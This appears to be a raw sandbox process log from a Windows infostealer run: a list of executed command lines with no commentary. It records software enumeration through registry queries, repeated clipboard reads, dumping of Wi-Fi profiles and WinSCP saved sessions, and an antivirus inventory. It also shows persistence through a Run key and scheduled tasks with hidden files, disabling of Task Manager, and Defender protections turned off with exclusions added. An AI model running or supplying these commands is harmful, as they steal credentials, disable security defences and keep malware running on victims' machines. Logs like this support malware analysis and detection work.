C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kT1R3FBAwqeh_tezmp.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kT1R3FBAwqeh_tezmp.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function Get-AntiVirusProduct {
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupE6075N /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupE6075N /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupE6075N /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f
C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupE6075N /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest
C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn WindowsDriverSetupE6075N /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\"""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\""
C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\feather.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\6dPDOTWmbRW9.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\AppData\Roaming\6dPDOTWmbRW9.vbs
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut6cfk5.ps1" -RunAsAdministrator"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut6cfk5.ps1" -RunAsAdministrator
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\NT6\EvilGoose\hg\GooseDesktop.exe""
C:\Users\Admin\AppData\Local\Temp\NT6\EvilGoose\hg\GooseDesktop.exe
"C:\Users\Admin\AppData\Local\Temp\NT6\EvilGoose\hg\GooseDesktop.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004E4
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4084 get ExecutablePath"
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2004 --field-trial-handle=2008,i,9024636085319321406,17361428471219599506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2096 --field-trial-handle=2008,i,9024636085319321406,17361428471219599506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=4084 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\net.exe
net session
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\more.com
more +1
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
